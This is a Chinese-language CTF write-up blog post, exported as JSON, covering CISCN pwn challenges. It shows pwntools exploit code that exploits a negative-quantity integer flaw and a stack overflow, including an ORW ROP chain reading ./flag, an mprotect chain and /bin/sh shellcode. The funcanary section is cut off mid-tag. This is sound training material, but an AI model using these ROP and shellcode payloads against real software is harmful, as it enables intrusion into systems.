{"id":372,"date":"2024-12-13T17:20:46","date_gmt":"2024-12-13T09:20:46","guid":{"rendered":"http:\/\/8.141.27.105\/?p=372"},"modified":"2024-12-13T17:23:36","modified_gmt":"2024-12-13T09:23:36","slug":"2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2\/","title":{"rendered":"2023CISCN PWN\u90e8\u5206WP"},"content":{"rendered":"\n<p>\u70e7\u70e4\u644a(\u6574\u6570\u6ea2\u51fa+ROP+ORW)<\/p>\n\n\n\n<p>\u770b\u8d77\u6765\u50cf\u83dc\u5355\uff0c\u4f46\u662f\u4e0d\u662f\u5806\u9898\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1017\" height=\"854\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-374\"  sizes=\"auto, (max-width: 1017px) 100vw, 1017px\" \/><\/div><\/figure>\n\n\n\n<p>1\u8ddf2\u662f\u5564\u9152\u548c\u4e32\uff0c\u7528\u6765\u51cf\u53bb\u91d1\u989d\u7684\uff0c3\u662f\u770b\u8fd8\u5269\u591a\u5c11\u94b1\uff0c4\u662f\u4e70\u4e0b\u644a\u5b50\uff0c\u5173\u952e\u51fd\u6570\u5728gaiming\u91cc\u9762\uff0c\u6709\u4e2a\u5224\u65ad\u6761\u4ef6own\u3002<\/p>\n\n\n\n<p>\u53d1\u73b0\u57284\u91cc\u9762\uff0c\u5982\u679c\u4e70\u4e0b\u644a\u5b50\uff0cown\u5c31\u80fd\u4e3a1\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"425\" height=\"395\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-373\"  sizes=\"auto, (max-width: 425px) 100vw, 425px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u4f55\u8ba9\u91d1\u989d\u8fbe\u523010000\uff1f<\/p>\n\n\n\n<p>\u770b\u4e00\u4e0bpijiu\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"996\" height=\"701\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-377\"  sizes=\"auto, (max-width: 996px) 100vw, 996px\" \/><\/div><\/figure>\n\n\n\n<p>\u6263\u94b1\u91c7\u7528\u5f88\u7c97\u66b4\u7684\u76f4\u63a5\u4e58\u4e00\u4e2a-10\uff0c\u90a3\u5982\u679c\u8f93\u5165\u8d2d\u4e70\u7684\u5564\u9152\u662f\u4e2a\u8d1f\u6570\uff0c\u5c31\u80fd\u52a0\u94b1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"545\" height=\"495\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-375\"  sizes=\"auto, (max-width: 545px) 100vw, 545px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ea\u8981\u8f93\u5165\u662f\u4e2a\u5f88\u5927\u7684\u8d1f\u6570\u5c31\u80fd\u7206\u5f88\u591a\u7c73\uff0c\u7136\u540e\u5c31\u80fd\u987a\u5229\u4e70\u4e0b\u644a\u5b50\uff0c\u8fdb\u5165gaiming\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"384\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-376\"  sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-20-1024x409.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"409\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-20-1024x409.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-378\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>gaiming\u51fd\u6570\u6709\u5f88\u660e\u663e\u7684\u6808\u6ea2\u51fa\uff0c\u8fd9\u9053\u9898\u7528checksec\u65f6\u5019\u53d1\u73b0\u6709canary\uff0c\u4f46\u662f\u7ecf\u8fc7\u6d4b\u8bd5\u5176\u5b9e\u662f\u6ca1\u6709\u7684\uff0c\u770b\u6c47\u7f16\u4ee3\u7801\u4e5f\u77e5\u9053\u5e76\u6ca1\u6709:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"572\" height=\"920\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-379\"  sizes=\"auto, (max-width: 572px) 100vw, 572px\" \/><\/div><\/figure>\n\n\n\n<p>gaiming\u51fd\u6570\u5148scanf\u4e00\u4e2a\u503c\u7ed9v5\uff0cv5\u662f\u6808\u53d8\u91cf\uff0c\u7136\u540e\u628av5\u7684\u503c\u8d4b\u7ed9name\uff0cname\u662f\u4e2adata\u6bb5\u4e0a\u7684\u53d8\u91cf<\/p>\n\n\n\n<p>\u7531\u4e8e\u9898\u76ee\u6ca1\u6709\u540e\u95e8\u51fd\u6570\uff0c\u53c8\u662f\u9759\u6001\u7f16\u8bd1\uff0c\u6240\u4ee5\u6709\u4e09\u79cd\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n\n\n\n<p>1.mprotect+shellcode<\/p>\n\n\n\n<p>2.ORW<\/p>\n\n\n\n<p>3.ret2syscall<\/p>\n\n\n\n<p>\u5148\u5c55\u793a\u4e00\u4e0b\u7b2c\u4e8c\u79cd\u65b9\u6cd5ORW\uff1a<\/p>\n\n\n\n<p>ORW\u7684\u601d\u8def\u662f\uff0c\u5148\u628aflag\u8def\u5f84\u5199\u5165\uff0c\u540e\u9762\u53ef\u4ee5\u4f20\u7ed9name\uff0c\u7136\u540eopen\u4f20\u53c2name\u7684\u5730\u5740\uff0c\u6253\u5f00flag\u6587\u4ef6\uff0cread\u4e5f\u628a\u8bfb\u51fa\u6765\u7684\u5185\u5bb9\u5199\u5230name\u5730\u5740\uff0c\u6700\u540ewrite\u4ecename\u5730\u5740\u5199\u51fa\u6765flag<\/p>\n\n\n\n<p>open64(b&#8221;.\/flag&#8221;,0) 0 \u8868\u793a\u53ea\u8bfb<\/p>\n\n\n\n<p>read(3,name_addr,0x100)&nbsp;3\u662f\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0cname_addr\u662f\u5199\u5165\u5730\u5740\uff0c0x100\u662f\u5199\u5165\u591a\u5c11<\/p>\n\n\n\n<p>write(1,name_addr,0x100) 1\u662f\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0cname_addr\u662f\u8bfb\u5199\u5730\u5740\uff0c0x100\u662f\u8bfb\u5199\u591a\u5c11\uff08\u8f93\u51fa\u5230\u5c4f\u5e55\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"930\" height=\"182\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-382\"  sizes=\"auto, (max-width: 930px) 100vw, 930px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code># open(b'.\/flag\\x00\\x00', 0)\n\nORW = p64(pop_rdi_addr) + p64(name_addr) + p64(pop_rsi_addr) + p64(0) +p64(elf.sym&#91;\"open64\"])\n\n# read(3, name_addr, 0x50)\n\nORW += p64(pop_rdi_addr) + p64(3) + p64(pop_rsi_addr) + p64(name_addr) + p64(pop_rdx_rbx_addr) + p64(0x100) + p64(0) + p64(elf.sym&#91;\"read\"])\n\n# write(1, name_addr, 0x50)\n\nORW += p64(pop_rdi_addr) + p64(1) + p64(pop_rsi_addr) + p64(name_addr) + p64(pop_rdx_rbx_addr) + p64(0x100) + p64(0) + p64(elf.sym&#91;\"write\"])<\/code><\/pre>\n\n\n\n<p>\u53ea\u8981\u4fdd\u8bc1rsi rdi rdx\u662f\u89c4\u5b9a\u503c\u5c31\u884c\uff0c\u53ef\u4ee5\u6709\u591a\u4f59\u5bc4\u5b58\u5668\uff0c\u7ed9\u4ed6\u4eec\u968f\u4fbf\u8d4b\u4ec0\u4e48\u503c\u90fd\u53ef\u4ee5\uff0c\u53ea\u8981\u8bb0\u5f97\u8d4b\u503c\u7ef4\u6301\u6808\u5e73\u8861\u5c31\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-26-1024x361.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"361\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-26-1024x361.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-384\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u53e6\u4e00\u79cd\u601d\u8def\uff1a<\/p>\n\n\n\n<p>\u867d\u7136\u6709NX\uff0c\u4f46\u662f\u60f3\u5230\u662f\u9759\u6001\u7f16\u8bd1\uff0c\u901a\u5e38\u90fd\u4f1a\u6709mprotect\uff0c\u7528mprotect\u4fee\u6539\u67d0\u6bb5\u4e3a\u53ef\u6267\u884c\uff0c\u7136\u540e\u5199\u5165shellcode\u8df3\u8f6c\u5c31\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"945\" height=\"621\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-25.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-383\"  sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/div><\/figure>\n\n\n\n<p>mprotect\u8c03\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload1=cyclic(0x28)+p64(pop_rdi_addr)+p64(0x4E6000)+p64(pop_rsi_addr)+p64(0x3000)+p64(pop_rdx_rbx_addr)+p64(0x7)+p64(0)+p64(elf.sym&#91;\"mprotect\"])+p64(ret_addr)+p64(elf.sym&#91;\"main\"])\n\nio.sendline(payload1)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u8c03\u7528\u5b8c\u540e\u518d\u8fd4\u56demain\u51fd\u6570\uff0c\u8fd9\u65f6\u5019\u5199\u5165shellcode\u5e76\u8df3\u8f6c\u5230name_addr\u6267\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'.ljust(0x28, b'a') +p64(name_addr)\nio.sendline(payload)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u8fd9\u91cc\u6709\u51e0\u4e2a\u5751\u70b9\uff1a<\/p>\n\n\n\n<p>1.shellcode\u4e00\u5b9a\u8981\u627e\u5bf9\uff0c\u6211\u4e00\u5f00\u59cb\u627e\u768421\u5b57\u8282shellcode\u7528\u4e0d\u4e86\uff0c\u53c8\u627e\u4e86\u4e2a23\u5b57\u8282\u7684\u53ef\u4ee5\u7528\uff0c\u6240\u4ee5\u6709\u65f6\u5019\u62ff\u4e0d\u5230shell\u4e0d\u662f\u56e0\u4e3aexp\u5199\u4e0d\u5bf9\uff0c\u800c\u662f\u627e\u7684shellcode\u4e0d\u5bf9<\/p>\n\n\n\n<p>2.mprotect\u51fd\u6570\u6307\u5b9a\u7684\u4fee\u6539\u5730\u5740\u5fc5\u987b\u662f\u4e00\u4e2a\u5185\u5b58\u9875\u7684\u8d77\u59cb\u5730\u5740\uff0c\u800c\u4e14\u5927\u5c0f\u5fc5\u987b\u662f\u5185\u5b58\u9875\u6574\u6570\u500d\uff0c\u4e00\u9875\u662f4k\uff0c\u4e5f\u5c31\u662f0x1000,\u6240\u4ee5\u4fee\u6539\u5730\u5740\u5fc5\u987b\u4fdd\u8bc1\u540e\u4e09\u4f4d\u4e3a0\uff0c\u5927\u5c0f\u5fc5\u987b\u662fn*0x1000,\u800c\u6700\u540e\u8df3\u8f6c\u5230\u6267\u884cshellcode\u7684\u4f4d\u7f6e\u5e76\u4e0d\u662f\u4fee\u6539\u5185\u5b58\u9875\u7684\u8d77\u59cb\u4f4d\u7f6e\uff08\u4f4e\u7ea7\u9519\u8bef\uff09<\/p>\n\n\n\n<p>3.\u8bb0\u5f97\u6dfb\u52a0ret\u4fdd\u6301\u6808\u5e73\u8861<\/p>\n\n\n\n<p>\u5176\u5b9e\u8fd8\u6709\u66f4\u7b80\u5355\u7684\u4e00\u6761\u9f99\uff1a<\/p>\n\n\n\n<p>\u524d\u9762\u586b\u5145\u76f4\u63a5\u586bshellcode\uff0c\u540e\u9762\u8fd4\u56de\u4e0d\u7528\u8fd4\u56de\u5230main\uff0c\u76f4\u63a5\u56de\u5230shellcode\u6267\u884c\u5c31\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"948\" height=\"189\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-385\"  sizes=\"auto, (max-width: 948px) 100vw, 948px\" \/><\/div><\/figure>\n\n\n\n<p>rop=p64(pop_rdi_addr)+p64(0x4E6000)+p64(pop_rsi_addr)+p64(0x3000)+p64(pop_rdx_rbx_addr)+p64(0x7)+p64(0)+p64(elf.sym[&#8220;mprotect&#8221;])+p64(ret_addr)+p64(name_addr)<\/p>\n\n\n\n<p>payload = b&#8217;\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05&#8242;.ljust(0x28, b&#8217;a&#8217;)<\/p>\n\n\n\n<p>payload += rop<\/p>\n\n\n\n<p>io.sendline(payload)<\/p>\n\n\n\n<p>\u7b2c\u4e09\u79cd\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<p>ret2syscall<\/p>\n\n\n\n<p>\u5177\u4f53\u4e0d\u7ec6\u8bf4\u4e86\uff0c\u6bd4\u8f83\u5e38\u89c4<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2\/#funcanary\" title=\"funcanary:\">funcanary:<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"funcanary\"><\/span>funcanary:<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>main\u51fd\u6570\u7528while 1\u6b7b\u5faa\u73af\u91cd\u590d\u8c03\u7528\u4e86fork()\u51fd\u6570\u521b\u5efa\u5b50\u8fdb\u7a0b\uff0c\u4e00\u770b\u5c31\u662f\u8981\u7206\u7834canary<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-30.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1017\" height=\"654\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-30.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-388\"  sizes=\"auto, (max-width: 1017px) 100vw, 1017px\" \/><\/div><\/figure>\n\n\n\n<p>\u6b63\u5e38\u9000\u51fa\uff08\u4e5f\u5c31\u662f\u901a\u8fc7canary\u68c0\u6d4b\uff09\u5c31\u4f1a\u8fdb\u5165else\u5206\u652f\uff0c\u6267\u884c\u51fd\u6570sub_128A\uff0c\u8fd9\u91cc\u662f\u6ea2\u51fa\u70b9:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-29.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"978\" height=\"428\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-29.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-387\"  sizes=\"auto, (max-width: 